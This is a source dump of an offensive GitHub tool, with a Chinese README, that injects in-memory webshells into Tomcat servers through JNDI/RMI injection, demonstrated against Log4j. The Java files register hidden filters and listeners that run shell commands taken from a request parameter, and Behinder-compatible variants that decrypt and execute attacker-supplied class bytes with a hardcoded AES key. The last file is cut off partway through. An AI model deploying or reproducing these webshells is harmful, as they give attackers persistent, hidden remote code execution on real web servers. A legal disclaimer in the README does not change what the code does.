├── README.md
├── RMI_Inj_MemShell-0.1.2.jar
└── lib
├── exploit
├── RmiTest.class
├── RmiTest.java
├── filter
│ ├── tomcat10
│ │ ├── FRain10.class
│ │ ├── FRain10.java
│ │ ├── IFRain10.class
│ │ └── IFRain10.java
│ └── tomcat89
│ │ ├── FRain.class
│ │ ├── FRain.java
│ │ ├── IFRain.class
│ │ └── IFRain.java
├── listener
│ ├── tomcat10
│ │ ├── ILRain10.class
│ │ ├── ILRain10.java
│ │ ├── LRain10.class
│ │ └── LRain10.java
│ └── tomcat89
│ │ ├── ILRain.class
│ │ ├── ILRain.java
│ │ ├── LRain.class
│ │ └── LRain.java
├── servlet
│ ├── tomcat10
│ │ ├── ISRain10.class
│ │ ├── ISRain10.java
│ │ ├── SRain10.class
│ │ └── SRain10.java
│ └── tomcat89
│ │ ├── ISRain.class
│ │ ├── ISRain.java
│ │ ├── SRain.class
│ │ └── SRain.java
└── websocket
│ ├── BypassNginxCDN
│ ├── CmdEndpoint.class
│ ├── CmdEndpoint.java
│ ├── CmdEndpoint2.class
│ ├── CmdEndpoint2.java
│ ├── ProxyEndpoint$1.class
│ ├── ProxyEndpoint$2.class
│ ├── ProxyEndpoint$Attach.class
│ ├── ProxyEndpoint.class
│ ├── ProxyEndpoint.java
│ ├── ProxyEndpoint2$1.class
│ ├── ProxyEndpoint2$2.class
│ ├── ProxyEndpoint2$Attach.class
│ ├── ProxyEndpoint2.class
│ └── ProxyEndpoint2.java
│ ├── Tomcat_Spring_Jetty
│ ├── WebSocket_Proxy.class
│ ├── WebSocket_Proxy.java
│ ├── WsCmd.class
│ └── WsCmd.java
│ ├── WebSphere
│ ├── ProxyEndpoint$1.class
│ ├── ProxyEndpoint$2.class
│ ├── ProxyEndpoint$Attach.class
│ ├── ProxyEndpoint.class
│ ├── ProxyEndpoint.java
│ ├── WebsphereEndpoint.class
│ └── WebsphereEndpoint.java
│ └── resin
│ ├── CmdListener.class
│ └── CmdListener.java
└── web
└── web.jar
/README.md:
--------------------------------------------------------------------------------
1 | 很多时候打项目的时候会遇到jndi注入用不了ldap协议的情况,但是rmi却可以用,于是诞生了这个的工具。
2 |
3 |
4 | 适用于目标用不了ldap的情况
5 |
6 | 懒人专属。
7 | # 2023/01/06 0.1.2版本更新:
8 | 1.增加基于Tomcat、Spring、Jetty、resin、WebSphere的websocket内存马
9 |
10 | 2.增加BypassNginxCDN websocket内存马
11 |
12 | 3.优化使用和其他地方,该版本只有一个jar包,直接启动RMI_Inj_MemShell.jar根据提示使用就好了
13 |
14 | 内存马项目来自:星火实验室 https://github.com/veo/wsMemShell
15 |
16 | 界面:
17 |
18 | 
19 |
20 | websocket内存马演示:
21 |
22 | 
23 |
24 |
25 |
26 | ----------------分界线-----------------
27 | # 2022/07/18 0.1.1版本更新:
28 | 1.增加冰蝎内存马
29 |
30 | 2.改掉几个bug
31 |
32 | 界面:
33 |
34 | 
35 |
36 | ## 冰蝎内存马演示:
37 | 漏洞环境:springboot+Log4j
38 |
39 | 冰蝎版本:Behinder_v3.0_Beta_11.t00ls
40 | ### servlet:
41 | 
42 |
43 | ### filter:
44 | 
45 |
46 | ----------------分界线-----------------
47 | # 2020/07/06
48 | # 0.1版本用法:
49 | 把文件全上传到服务器/VPS上
50 |
51 | ## 先启动Log4jWeb-0.0.1:
52 | ```bash
53 | java -jar Log4jWeb-0.0.1.jar
54 | ```
55 |
56 | ## 然后启动Log4j2Memory-0.1.jar
57 | ```bash
58 | java -jar Log4j2Memory-0.1.jar
59 | ```
60 | 就可以食用
61 |
62 |
63 | # 工具说明:
64 | 暂时只有三种类型可供选择:filter、Servlet、listener
65 |
66 | 目前暂时只支持注入部分基于tomcat7-8-10环境的内存马(部分springboot等)
67 |
68 |
69 | 后续会持续更新内存马
70 |
71 | 效果图(Log4j漏洞演示):
72 | 
73 |
74 | 
75 |
76 | 
77 |
78 | 内存马来自项目:https://github.com/ce-automne/TomcatMemShell
79 |
80 | ----------------分界线-----------------
81 |
82 | # 法律
83 | ```bash
84 | 本工具仅能在取得足够合法授权的企业安全建设中使用,
85 | 本工具使用过程中,您应确保自己所有行为符合当地的法律法规。
86 | 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。
87 | 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。
88 | 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束
89 | ```
90 |
91 |
92 | ## Stargazers over time
93 |
94 | [](https://starchart.cc/novysodope/RMI_Inj_MemShell)
95 |
--------------------------------------------------------------------------------
/RMI_Inj_MemShell-0.1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/RMI_Inj_MemShell-0.1.2.jar
--------------------------------------------------------------------------------
/lib/exploit/RmiTest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/RmiTest.class
--------------------------------------------------------------------------------
/lib/exploit/RmiTest.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 |
3 | /**
4 | * @Author:novy
5 | * @Date:12:42 2022/6/28
6 | * @Version 1.0
7 | **/
8 | public class RmiTest {
9 | public static void main( String[] args ) throws Exception {
10 | new RmiTest();
11 | }
12 | public RmiTest(){
13 |
14 | }
15 | static {
16 | try {
17 | System.out.println("ok");
18 | String osName = System.getProperties().getProperty("os.name");
19 | if (osName.contains("Windows")) {
20 | java.lang.Runtime.getRuntime().exec("calc");
21 | }
22 | if (osName.contains("Mac OS")){
23 | String[] cmd = {"/bin/bash", "-c","open /System/Applications/Calculator.app/Contents/MacOS/Calculator"};
24 | java.lang.Runtime.getRuntime().exec(cmd);
25 | }
26 | } catch (IOException e) {
27 | e.printStackTrace();
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat10/FRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat10/FRain10.class
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat10/FRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.*;
2 | import jakarta.servlet.http.HttpServletRequest;
3 | import org.apache.catalina.Context;
4 | import org.apache.catalina.core.ApplicationFilterConfig;
5 | import org.apache.catalina.core.StandardContext;
6 | import org.apache.catalina.loader.WebappClassLoaderBase;
7 | import org.apache.tomcat.util.descriptor.web.FilterDef;
8 | import org.apache.tomcat.util.descriptor.web.FilterMap;
9 | import java.io.IOException;
10 | import java.lang.reflect.Constructor;
11 | import java.lang.reflect.Field;
12 | import java.util.Map;
13 |
14 | public class FRain10 implements Filter {
15 |
16 | static{
17 | try{
18 | final String name = "AutomneGreet";
19 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
20 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
21 |
22 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
23 | Configs.setAccessible(true);
24 | Map filterConfigs = (Map) Configs.get(standardContext);
25 |
26 | if (filterConfigs.get(name) == null){
27 | Filter filter = new FRain10();
28 |
29 | FilterDef filterDef = new FilterDef();
30 | filterDef.setFilter(filter);
31 | filterDef.setFilterName(name);
32 | filterDef.setFilterClass(filter.getClass().getName());
33 |
34 | standardContext.addFilterDef(filterDef);
35 |
36 | FilterMap filterMap = new FilterMap();
37 | filterMap.addURLPattern("/*");
38 | filterMap.setFilterName(name);
39 | filterMap.setDispatcher(DispatcherType.REQUEST.name());
40 |
41 | standardContext.addFilterMapBefore(filterMap);
42 |
43 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
44 | constructor.setAccessible(true);
45 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
46 |
47 | filterConfigs.put(name,filterConfig);
48 | }
49 | }catch (Exception hi){
50 | //hi.printStackTrace();
51 | }
52 | }
53 |
54 | @Override
55 | public void init(FilterConfig filterConfig) throws ServletException {
56 |
57 | }
58 |
59 | @Override
60 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
61 | HttpServletRequest req = (HttpServletRequest) servletRequest;
62 | if (req.getParameter("chan") != null){
63 | Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
64 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
65 | new java.io.InputStreamReader(process.getInputStream()));
66 | StringBuilder stringBuilder = new StringBuilder();
67 | String line;
68 | while ((line = bufferedReader.readLine()) != null) {
69 | stringBuilder.append(line + '\n');
70 | }
71 | servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
72 | servletResponse.getOutputStream().flush();
73 | servletResponse.getOutputStream().close();
74 | return;
75 | }
76 | filterChain.doFilter(servletRequest,servletResponse);
77 | }
78 |
79 | @Override
80 | public void destroy() {
81 |
82 | }
83 |
84 | }
85 |
86 |
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat10/IFRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat10/IFRain10.class
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat10/IFRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.*;
2 | import jakarta.servlet.http.HttpServletRequest;
3 | import jakarta.servlet.http.HttpServletResponse;
4 | import jakarta.servlet.http.HttpSession;
5 | import org.apache.catalina.Context;
6 | import org.apache.catalina.core.ApplicationFilterConfig;
7 | import org.apache.catalina.core.StandardContext;
8 | import org.apache.catalina.loader.WebappClassLoaderBase;
9 | import org.apache.tomcat.util.descriptor.web.FilterDef;
10 | import org.apache.tomcat.util.descriptor.web.FilterMap;
11 |
12 | import javax.crypto.Cipher;
13 | import javax.crypto.spec.SecretKeySpec;
14 | import java.io.IOException;
15 | import java.lang.reflect.Constructor;
16 | import java.lang.reflect.Field;
17 | import java.lang.reflect.Method;
18 | import java.util.HashMap;
19 | import java.util.Map;
20 |
21 | public class IFRain10 implements Filter {
22 | private final String pa = "3ad2fddfe8bad8e6";
23 |
24 | static{
25 | try{
26 | final String name = "AutomneGreet";
27 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
28 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
29 |
30 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
31 | Configs.setAccessible(true);
32 | Map filterConfigs = (Map) Configs.get(standardContext);
33 |
34 | if (filterConfigs.get(name) == null){
35 | Filter filter = new IFRain10();
36 |
37 | FilterDef filterDef = new FilterDef();
38 | filterDef.setFilter(filter);
39 | filterDef.setFilterName(name);
40 | filterDef.setFilterClass(filter.getClass().getName());
41 |
42 | standardContext.addFilterDef(filterDef);
43 |
44 | FilterMap filterMap = new FilterMap();
45 | filterMap.addURLPattern("/*");
46 | filterMap.setFilterName(name);
47 | filterMap.setDispatcher(DispatcherType.REQUEST.name());
48 |
49 | standardContext.addFilterMapBefore(filterMap);
50 |
51 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
52 | constructor.setAccessible(true);
53 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
54 |
55 | filterConfigs.put(name,filterConfig);
56 | }
57 | }catch (Exception hi){
58 | //hi.printStackTrace();
59 | }
60 | }
61 |
62 | @Override
63 | public void init(FilterConfig filterConfig) throws ServletException {
64 |
65 | }
66 |
67 | @Override
68 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
69 | HttpServletRequest request = (HttpServletRequest) servletRequest;
70 | HttpServletResponse response = (HttpServletResponse) servletResponse;
71 | HttpSession session = request.getSession();
72 |
73 | Map pageContext = new HashMap();
74 | pageContext.put("session", session);
75 | pageContext.put("request", request);
76 | pageContext.put("response", response);
77 |
78 | ClassLoader cl = (ClassLoader) Thread.currentThread().getContextClassLoader();
79 |
80 | if (request.getMethod().equals("POST")) {
81 | if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
82 | Class Lclass = cl.getClass().getSuperclass();
83 | RushThere(Lclass, cl, session, request, pageContext);
84 | } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
85 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
86 | RushThere(Lclass, cl, session, request, pageContext);
87 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
88 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
89 | RushThere(Lclass, cl, session, request, pageContext);
90 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
91 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
92 | RushThere(Lclass, cl, session, request, pageContext);
93 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
94 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
95 | RushThere(Lclass, cl, session, request, pageContext);
96 | } else {
97 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
98 | RushThere(Lclass, cl, session, request, pageContext);
99 | }
100 | filterChain.doFilter(servletRequest, servletResponse);
101 | }
102 | }
103 |
104 | @Override
105 | public void destroy() {
106 |
107 | }
108 |
109 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
110 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
111 | try {
112 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
113 | define.setAccessible(true);
114 | Class uclass = null;
115 | try {
116 | uclass = cl.loadClass("U");
117 | } catch (ClassNotFoundException e) {
118 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
119 | }
120 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
121 | constructor.setAccessible(true);
122 | Object u = constructor.newInstance(this.getClass().getClassLoader());
123 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
124 | Um.setAccessible(true);
125 | String k = pa;
126 | session.setAttribute("u", k);
127 | Cipher c = Cipher.getInstance("AES");
128 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
129 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
130 | Class eclass = (Class) Um.invoke(u, eClassBytes);
131 | Object a = eclass.newInstance();
132 | Method b = eclass.getDeclaredMethod("equals", Object.class);
133 | b.setAccessible(true);
134 | b.invoke(a, pageContext);
135 | return;
136 | }catch (Exception ig){
137 | //ig.printStackTrace();
138 | }
139 | }
140 |
141 | }
142 |
143 |
144 |
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat89/FRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat89/FRain.class
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat89/FRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.Context;
2 | import org.apache.catalina.core.ApplicationFilterConfig;
3 | import org.apache.catalina.core.StandardContext;
4 | import org.apache.catalina.loader.WebappClassLoaderBase;
5 | import org.apache.tomcat.util.descriptor.web.FilterDef;
6 | import org.apache.tomcat.util.descriptor.web.FilterMap;
7 |
8 | import javax.servlet.*;
9 | import javax.servlet.http.HttpServletRequest;
10 | import java.io.IOException;
11 | import java.lang.reflect.Constructor;
12 | import java.lang.reflect.Field;
13 | import java.util.Map;
14 |
15 | public class FRain implements Filter{
16 |
17 | static{
18 | try{
19 | final String name = "AutomneGreet";
20 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
21 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
22 |
23 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
24 | Configs.setAccessible(true);
25 | Map filterConfigs = (Map) Configs.get(standardContext);
26 |
27 | if (filterConfigs.get(name) == null){
28 | Filter filter = new FRain();
29 |
30 | FilterDef filterDef = new FilterDef();
31 | filterDef.setFilter(filter);
32 | filterDef.setFilterName(name);
33 | filterDef.setFilterClass(filter.getClass().getName());
34 |
35 | standardContext.addFilterDef(filterDef);
36 |
37 | FilterMap filterMap = new FilterMap();
38 | filterMap.addURLPattern("/*");
39 | filterMap.setFilterName(name);
40 | filterMap.setDispatcher(DispatcherType.REQUEST.name());
41 |
42 | standardContext.addFilterMapBefore(filterMap);
43 |
44 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
45 | constructor.setAccessible(true);
46 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
47 |
48 | filterConfigs.put(name,filterConfig);
49 | }
50 | }catch (Exception hi){
51 | //hi.printStackTrace();
52 | }
53 | }
54 |
55 | @Override
56 | public void init(FilterConfig filterConfig) throws ServletException {
57 |
58 | }
59 |
60 | @Override
61 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
62 | HttpServletRequest req = (HttpServletRequest) servletRequest;
63 | if (req.getParameter("chan") != null){
64 | Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
65 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
66 | new java.io.InputStreamReader(process.getInputStream()));
67 | StringBuilder stringBuilder = new StringBuilder();
68 | String line;
69 | while ((line = bufferedReader.readLine()) != null) {
70 | stringBuilder.append(line + '\n');
71 | }
72 | servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
73 | servletResponse.getOutputStream().flush();
74 | servletResponse.getOutputStream().close();
75 | return;
76 | }
77 | filterChain.doFilter(servletRequest,servletResponse);
78 | }
79 |
80 | @Override
81 | public void destroy() {
82 |
83 | }
84 |
85 | }
86 |
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat89/IFRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/filter/tomcat89/IFRain.class
--------------------------------------------------------------------------------
/lib/exploit/filter/tomcat89/IFRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.Context;
2 | import org.apache.catalina.core.ApplicationFilterConfig;
3 | import org.apache.catalina.core.StandardContext;
4 | import org.apache.catalina.loader.WebappClassLoaderBase;
5 | import org.apache.tomcat.util.descriptor.web.FilterDef;
6 | import org.apache.tomcat.util.descriptor.web.FilterMap;
7 |
8 | import javax.crypto.Cipher;
9 | import javax.crypto.spec.SecretKeySpec;
10 | import javax.servlet.*;
11 | import javax.servlet.http.HttpServletRequest;
12 | import javax.servlet.http.HttpServletResponse;
13 | import javax.servlet.http.HttpSession;
14 | import java.io.IOException;
15 | import java.lang.reflect.Constructor;
16 | import java.lang.reflect.Field;
17 | import java.lang.reflect.Method;
18 | import java.util.HashMap;
19 | import java.util.Map;
20 |
21 | public class IFRain implements Filter{
22 | private final String pa = "3ad2fddfe8bad8e6";
23 |
24 | static{
25 | try{
26 | final String name = "AutomneGreet";
27 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
28 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
29 |
30 | Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
31 | Configs.setAccessible(true);
32 | Map filterConfigs = (Map) Configs.get(standardContext);
33 |
34 | if (filterConfigs.get(name) == null){
35 | Filter filter = new IFRain();
36 |
37 | FilterDef filterDef = new FilterDef();
38 | filterDef.setFilter(filter);
39 | filterDef.setFilterName(name);
40 | filterDef.setFilterClass(filter.getClass().getName());
41 |
42 | standardContext.addFilterDef(filterDef);
43 |
44 | FilterMap filterMap = new FilterMap();
45 | filterMap.addURLPattern("/*");
46 | filterMap.setFilterName(name);
47 | filterMap.setDispatcher(DispatcherType.REQUEST.name());
48 |
49 | standardContext.addFilterMapBefore(filterMap);
50 |
51 | Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
52 | constructor.setAccessible(true);
53 | ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
54 |
55 | filterConfigs.put(name,filterConfig);
56 | }
57 | }catch (Exception hi){
58 | //hi.printStackTrace();
59 | }
60 | }
61 |
62 | @Override
63 | public void init(FilterConfig filterConfig) throws ServletException {
64 |
65 | }
66 |
67 | @Override
68 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
69 | HttpServletRequest request = (HttpServletRequest) servletRequest;
70 | HttpServletResponse response = (HttpServletResponse) servletResponse;
71 | HttpSession session = request.getSession();
72 |
73 | Map pageContext = new HashMap();
74 | pageContext.put("session", session);
75 | pageContext.put("request", request);
76 | pageContext.put("response", response);
77 |
78 | ClassLoader cl = (ClassLoader) Thread.currentThread().getContextClassLoader();
79 |
80 | if (request.getMethod().equals("POST")) {
81 | if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
82 | Class Lclass = cl.getClass().getSuperclass();
83 | RushThere(Lclass, cl, session, request, pageContext);
84 | } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
85 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
86 | RushThere(Lclass, cl, session, request, pageContext);
87 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
88 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
89 | RushThere(Lclass, cl, session, request, pageContext);
90 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
91 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
92 | RushThere(Lclass, cl, session, request, pageContext);
93 | } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
94 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
95 | RushThere(Lclass, cl, session, request, pageContext);
96 | } else {
97 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
98 | RushThere(Lclass, cl, session, request, pageContext);
99 | }
100 | filterChain.doFilter(servletRequest, servletResponse);
101 | }
102 | }
103 |
104 | @Override
105 | public void destroy() {
106 |
107 | }
108 |
109 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
110 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
111 | try {
112 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
113 | define.setAccessible(true);
114 | Class uclass = null;
115 | try {
116 | uclass = cl.loadClass("U");
117 | } catch (ClassNotFoundException e) {
118 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
119 | }
120 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
121 | constructor.setAccessible(true);
122 | Object u = constructor.newInstance(this.getClass().getClassLoader());
123 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
124 | Um.setAccessible(true);
125 | String k = pa;
126 | session.setAttribute("u", k);
127 | Cipher c = Cipher.getInstance("AES");
128 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
129 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
130 | Class eclass = (Class) Um.invoke(u, eClassBytes);
131 | Object a = eclass.newInstance();
132 | Method b = eclass.getDeclaredMethod("equals", Object.class);
133 | b.setAccessible(true);
134 | b.invoke(a, pageContext);
135 | return;
136 | }catch (Exception ig){
137 | //ig.printStackTrace();
138 | }
139 | }
140 |
141 | }
142 |
143 |
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat10/ILRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat10/ILRain10.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat10/ILRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.ServletRequestEvent;
2 | import jakarta.servlet.ServletRequestListener;
3 | import jakarta.servlet.http.HttpServletRequest;
4 | import jakarta.servlet.http.HttpSession;
5 | import org.apache.catalina.connector.Request;
6 | import org.apache.catalina.connector.RequestFacade;
7 | import org.apache.catalina.connector.Response;
8 | import org.apache.catalina.core.StandardContext;
9 | import org.apache.catalina.loader.WebappClassLoaderBase;
10 |
11 | import javax.crypto.Cipher;
12 | import javax.crypto.spec.SecretKeySpec;
13 | import java.lang.reflect.Constructor;
14 | import java.lang.reflect.Field;
15 | import java.lang.reflect.Method;
16 | import java.util.HashMap;
17 | import java.util.Map;
18 |
19 | public class ILRain10 implements ServletRequestListener {
20 | private final String pa = "3ad2fddfe8bad8e6";
21 |
22 | static {
23 | try {
24 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
25 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
26 |
27 | ILRain10 servletRequestListener = new ILRain10();
28 | Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
29 | addlistener.invoke(standardContext,servletRequestListener);
30 |
31 | } catch (Exception hi) {
32 | //hi.printStackTrace();
33 | }
34 | }
35 |
36 |
37 | @Override
38 | public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
39 |
40 | }
41 | @Override
42 | public void requestInitialized(ServletRequestEvent servletRequestEvent) {
43 | try{
44 | RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
45 | Field field = requestfacade.getClass().getDeclaredField("request");
46 | field.setAccessible(true);
47 | Request request = (Request) field.get(requestfacade);
48 | Response response = request.getResponse();
49 | HttpSession session = request.getSession();
50 |
51 | Map pageContext = new HashMap();
52 | pageContext.put("session", session);
53 | pageContext.put("request", request);
54 | pageContext.put("response", response);
55 |
56 | ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
57 |
58 | if (request.getMethod().equals("POST")){
59 | if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
60 | Class Lclass = cl.getClass().getSuperclass();
61 | RushThere(Lclass,cl,session,request,pageContext);
